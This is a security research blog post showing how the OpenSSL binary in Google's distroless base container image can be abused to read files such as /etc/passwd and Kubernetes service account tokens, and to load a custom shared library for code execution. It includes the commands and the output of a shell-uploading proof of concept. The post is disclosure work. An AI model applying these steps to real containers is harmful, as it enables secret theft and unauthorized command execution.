Exploiting Distroless Images

blogs· 7min

September 22, 2022

An abuse of functionality in the OpenSSL binary, installed in the official Google Container Tools Distroless Base container image, allows for command execution and arbitrary file read and write on distroless containers. By abusing the enc functionality in the OpenSSL binary it is possible to read and write to the filesystem using the -in and -out options and combining the write to the filesystem capability with the engine functionality that allows us to load shared libraries, it is possible to obtain command execution by uploading and loading malicious library.

This post will cover:

Attack Surface

Distroless images contain only the application and its runtime dependencies. They do not contain package managers, shells or any other programs you would expect to find in a standard Linux distribution. Without non-essential executables and libraries, distroless images are often recommended for their performance, size and security due to the reduced attack surface. However, as we will see not all distroless images are built the same.

Product URLs

The Distroless Base image (gcr.io/distroless/base) contains the OpenSSL package, installed by the following bazel script https://github.com/GoogleContainerTools/distroless/blob/main/base/base.bzl

        name = "base_" + user + "_" + arch + distro_suffix,
        architecture = arch,
        base = ":static_" + user + "_" + arch + distro_suffix,
        debs = [

The OpenSSL package installs two executable binaries the c_rehash and the openssl in the /usr/bin/ directory.

# dpkg -L openssl | grep bin/

Abusing OpenSSL functionalities

To demonstrate the vulnerabilities we will use a docker container running a simple Golang application on a distroless base image.


package main

import (

func main() {
	for {
		fmt.Println("Hello world!")
		time.Sleep(time.Second * 1)


FROM golang:1.18 as builder

WORKDIR /go/src/app
ADD . /go/src/app

RUN go get -d -v ./...

RUN go build -o /go/bin/app

FROM gcr.io/distroless/base
COPY --from=builder /go/bin/app /
CMD ["/app"]

Building the docker image.

% docker build -t distroless-demo .

Running the container and verifying that the application is working as intended.

% docker run --name demo -d distroless-demo
% docker attach demo                           
Hello world!
Hello world!
Hello world!
read escape sequence

And as expected there is no shell available in the container.

% docker exec -it demo /bin/sh   
OCI runtime exec failed: exec failed: container_linux.go:380: starting 
container process caused: exec: "/bin/sh": stat /bin/sh: no such file or 
directory: unknown  

But OpenSSL provides and interactive command prompt that can be abused.

% docker exec -it demo /usr/bin/openssl

OpenSSL available commands.

OpenSSL> help 
Standard commands
asn1parse         ca                ciphers           cms               
crl               crl2pkcs7         dgst              dhparam           
dsa               dsaparam          ec                ecparam           
enc               engine            errstr            gendsa            
genpkey           genrsa            help              list              
nseq              ocsp              passwd            pkcs12            
pkcs7             pkcs8             pkey              pkeyparam         
pkeyutl           prime             rand              rehash            
req               rsa               rsautl            s_client          
s_server          s_time            sess_id           smime             
speed             spkac             srp               storeutl          
ts                verify            version           x509              

Message Digest commands (see the `dgst' command for more details)
blake2b512        blake2s256        gost              md4               
md5               rmd160            sha1              sha224            
sha256            sha3-224          sha3-256          sha3-384          
sha3-512          sha384            sha512            sha512-224        
sha512-256        shake128          shake256          sm3               

Cipher commands (see the `enc' command for more details)
aes-128-cbc       aes-128-ecb       aes-192-cbc       aes-192-ecb       
aes-256-cbc       aes-256-ecb       aria-128-cbc      aria-128-cfb      
aria-128-cfb1     aria-128-cfb8     aria-128-ctr      aria-128-ecb      
aria-128-ofb      aria-192-cbc      aria-192-cfb      aria-192-cfb1     
aria-192-cfb8     aria-192-ctr      aria-192-ecb      aria-192-ofb      
aria-256-cbc      aria-256-cfb      aria-256-cfb1     aria-256-cfb8     
aria-256-ctr      aria-256-ecb      aria-256-ofb      base64            
bf                bf-cbc            bf-cfb            bf-ecb            
bf-ofb            camellia-128-cbc  camellia-128-ecb  camellia-192-cbc  
camellia-192-ecb  camellia-256-cbc  camellia-256-ecb  cast              
cast-cbc          cast5-cbc         cast5-cfb         cast5-ecb         
cast5-ofb         des               des-cbc           des-cfb           
des-ecb           des-ede           des-ede-cbc       des-ede-cfb       
des-ede-ofb       des-ede3          des-ede3-cbc      des-ede3-cfb      
des-ede3-ofb      des-ofb           des3              desx              
rc2               rc2-40-cbc        rc2-64-cbc        rc2-cbc           
rc2-cfb           rc2-ecb           rc2-ofb           rc4               
rc4-40            seed              seed-cbc          seed-cfb          
seed-ecb          seed-ofb          sm4-cbc           sm4-cfb           
sm4-ctr           sm4-ecb           sm4-ofb           

Exploitation details

1. Reading arbitrary files, no kubectl cp no problem!

Abusing the OpenSSL enc functionality allows us to read files inside the container filesystem.

% docker exec -it demo /usr/bin/openssl
OpenSSL> enc -in /etc/passwd

2. Writing and executing custom "malicious" binaries

Abusing OpenSSL enc and engine functionalities allows us to write and execute a custom library running our "malicious" code.


Custom library source code.

#include <openssl/engine.h>
#include <sys/utsname.h>

static int bind(ENGINE *e, const char *id) {

  struct utsname buf;

  printf("Hostname: %s" ,buf.nodename);

  return 1;


Compilling the library using gcc.

sudo apt install openssl-devel -y
gcc -fPIC -o hostname.o -c hostname.c && gcc -s -shared -o hostname.so -lcrypto hostname.o

Base64 encode the library.

base64 ./hostname.so

Writing the payload

Writing the base64 encoded library using the OpenSSL enc functionality.

% docker exec -it demo /usr/bin/openssl                       
OpenSSL> enc -d -a -out /tmp/hostname.so

Executing the payload

Executing the custom library using the OpenSSL engine functionality and print the container hostname.

% docker exec -it demo /usr/bin/openssl engine /tmp/hostname.so
Hostname: d68dc92b5c99(/tmp/hostname.so) <NULL>

Attack scenarios

  • In a command injection attack, when an application running on a distroless base image executes unsafe user-supplied data, an adversary can abuse OpenSSL to perform actions otherwise not possible, like reading files or instaling custom attack tools.
  • In a scenario where an adversary has obtained access to a Kubernetes cluster, he can abuse OpenSSL installed on the distroless base image to read the service account tokens, secrets injected or mounted in the filesystem and even gain interactive command execution by uploading a custom shell.

Reading the Kubernets service account token using OpenSSL.

% kubectl exec -it distroless -- /usr/bin/openssl enc -in /var/run/secrets/kubernetes.io/serviceaccount/token

Gaining interactive command execution by uploading a custom shell.

python3 poc.py
[*] Uploading the shell
[*] Uploading the payload
[*] Executing the payload
[*] Getting a shell
# set
PS1='# '
PS2='> '
PS4='+ '


Not all Distroless images (static, base, ...) are created equal, and this should be taken into account when selecting a base image for critical projects. This issue was reported to Google in August 2021 and Google decided not to fix it.

by Daniel Teixeira Lead of Offensive Security

Further resources

blogs · 5 min

.tech Podcast - Kubernetes as a cloud operating system

Natan Yellin joins us to his insights on the challenges of running software at scale, which now involves maintaining more complex system architecture than ever. Then, he walks us through the open-source tool Robusta Dev and how it can make running systems on Kubernetes easier!

September 15, 2022

blogs · 4 min

.tech Podcast - Measuring the success of engineering teams

Evelina Vrabie joins us to share her insights into measuring the success of engineering teams. She tells us about the role of an engineering manager as well as the four types of success. Then, she walks us through how to measure productivity and high performance through research-based frameworks.

August 16, 2022

blogs · 6 min

PKI certificate management

 I have a rough understanding of PKI certificates, how they work, and what TLS is in general. However, I've always struggled to understand the details, particularly from the point of view of an operator. How do I check if a certificate is valid? How do I check who issued it? What does it even mean to "issue" a certificate? To make matters worse, I'm frequently confounded by the variety of different file types used for certificates. Is it a pem, or a crt, or a pub? Speaking of pub, what's the difference between the TLS certificate my server uses to encrypt traffic, and the certificates I use for SSH authentication? In this post, I will answer these questions and then walk though a practical example of using certificates for TLS via a local nginx proxy, modeling the client/server TLS you often see on the web.

August 5, 2022